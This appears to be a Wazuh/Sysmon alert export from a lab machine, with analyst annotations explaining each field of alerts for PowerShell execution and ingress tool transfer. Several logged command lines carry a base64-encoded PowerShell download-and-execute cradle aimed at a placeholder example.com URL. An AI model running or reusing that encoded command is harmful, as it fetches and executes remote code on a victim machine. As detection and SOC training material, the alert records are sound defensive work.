data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:39:19.846 ProcessGuid: {94294ddc-bd97-680a-a20b-000000000e00} ProcessId: 13412 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd94-680a-9f0b-000000000e00} ParentProcessId: 9520 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:19.846
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd97-680a-a20b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13412
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd94-680a-9f0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  9520
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:25.594+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:25.594+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  91
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534365.1831482
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:23.1989175Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285278
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:39:23.146 ProcessGuid: {94294ddc-bd97-680a-a20b-000000000e00} ProcessId: 13412 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_ws0ywxcj.g4z.ps1 CreationUtcTime: 2025-04-24 22:39:23.146 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:23.146
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd97-680a-a20b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13412
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ws0ywxcj.g4z.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:39:23.146
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:29.035+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:29.035+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  88
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534369.1834251
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:26.3809613Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285299
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:39:24.789 ProcessGuid: {94294ddc-bd9c-680a-a40b-000000000e00} ProcessId: 12304 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bd97-680a-a20b-000000000e00} ParentProcessId: 13412 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:24.789
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd9c-680a-a40b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bd97-680a-a20b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  13412
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:29.039+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:29.039+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  92
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534369.1842322
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:26.6347400Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285300
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:39:26.599 ProcessGuid: {94294ddc-bd9c-680a-a40b-000000000e00} ProcessId: 12304 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_kkk1op4e.muk.ps1 CreationUtcTime: 2025-04-24 22:39:26.599 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:39:26.599
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bd9c-680a-a40b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  12304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_kkk1op4e.muk.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:39:26.599
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:39:32.737+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:39:32.737+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  89
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534372.1845091
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:39:30.0574559Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285327
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

